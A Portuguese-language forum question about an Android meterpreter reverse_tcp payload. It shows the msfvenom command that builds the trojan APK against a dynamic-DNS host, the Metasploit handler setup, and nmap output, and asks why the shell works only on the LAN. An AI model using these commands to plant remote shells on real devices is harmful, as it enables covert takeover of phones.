Primeiro de tudo, este é meu primeiro post,
então, por favor, não ignore isso. Você pode ter visto essa pergunta antes.
Antes de marcar isso como duplicado, por favor, entenda meus problemas.
Eu tenho muitos problemas. Estou usando isso para fins educacionais.
observe o seguinte:
- Eu não tenho um roteador.
- Eu instalei o Kali 2.0 (sana).
- Eu uso meu celular Android para se conectar à INTERNET via tethering USB.
Agora, vou explicar o que aconteceu.
primeiro de tudo o que criei uma carga útil Android
msfvenom -p android/meterpreter/reverse_tcp LHOST=xxx.xxx.net LPORT=4444 -o test1.apk
xxx.xxx.net é meu DNS não registrado no IP (oculto com x);
então eu assinei com sucesso.
Agora, enviei-o para outro dispositivo Android via Bluetooth (para que o endereço IP do meu dispositivo não seja alterado no processo. Ele também não está conectado à LAN)
então eu instalei com sucesso.
ifconfig:
# ifconfig
eth0 Link encap:Ethernet HWaddr 78:24:af:bc:a8:a2
UP BROADCAST MULTICAST MTU:1500 Metric:1
RX packets:0 errors:0 dropped:0 overruns:0 frame:0
TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:0 (0.0 B) TX bytes:0 (0.0 B)
lo Link encap:Local Loopback
inet addr:127.0.0.1 Mask:255.0.0.0
inet6 addr: ::1/128 Scope:Host
UP LOOPBACK RUNNING MTU:65536 Metric:1
RX packets:1072 errors:0 dropped:0 overruns:0 frame:0
TX packets:1072 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:87360 (85.3 KiB) TX bytes:87360 (85.3 KiB)
usb0 Link encap:Ethernet HWaddr 42:c8:eb:7b:43:a9
inet addr:192.168.42.50 Bcast:192.168.42.255 Mask:255.255.255.0
inet6 addr: fe80::40c8:ebff:fe7b:43a9/64 Scope:Link
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:20535 errors:21 dropped:0 overruns:0 frame:21
TX packets:23085 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:11073420 (10.5 MiB) TX bytes:3833297 (3.6 MiB)
então eu abri o terminal.
# msfconsole
_____________
msf > use exploit/multi/handler
msf exploit(handler)
set payload android/meterpreter/reverse_tcp
payload => android/meterpreter/reverse_tcp
msf exploit(handler)
set lhost 192.168.42.50
lhost => 192.168.42.50
msf exploit(handler)
set lport 4444
lport => 4444
msf exploit(handler) > exploit
[*] Started reverse handler on 192.168.42.50:4444
[*] Starting the payload handler...
Depois de abrir o aplicativo no celular de destino, nada é recebido no
terminal de metasploit.
No entanto, o mesmo funciona bem em LAN.
mas quando se trata de Internet falha.
Eu tentei quase tudo que posso fazer, mas em vão.
Descobri que as portas estão abertas no endereço IP local.
# nmap 192.168.42.50
Starting Nmap 6.49BETA4 ( https://nmap.org ) at 2016-03-27 22:53 IST
Nmap scan report for kali (192.168.42.50)
Host is up (0.0000070s latency).
Not shown: 999 closed ports
PORT STATE SERVICE
4444/tcp open krb524
Nmap done: 1 IP address (1 host up) scanned in 1.75 seconds
mas eles estão fechados no DNS não-ip registrado.
# nmap xxx.xxx.net
Starting Nmap 6.49BETA4 ( https://nmap.org ) at 2016-03-27 22:55 IST
Nmap scan report for xxx.xxx.net (a.b.c.d)
Host is up (0.22s latency).
rDNS record for a.b.c.d: static-a-b-c-d.ctrls.in
Not shown: 990 closed ports
PORT STATE SERVICE
21/tcp filtered ftp
53/tcp filtered domain
80/tcp open http
111/tcp open rpcbind
443/tcp open https
445/tcp filtered microsoft-ds
554/tcp filtered rtsp
1723/tcp filtered pptp
3306/tcp open mysql
8022/tcp open oa-system
Nmap done: 1 IP address (1 host up) scanned in 144.05 seconds
nota: a.b.c.d é o endereço IP resolvido do meu DNS
Então, como exatamente posso estabelecer uma conexão bem-sucedida?
Se você acha que, de qualquer maneira, essa questão está fora do tópico ou algo mais, por favor, sugira-me uma solução de alguma forma.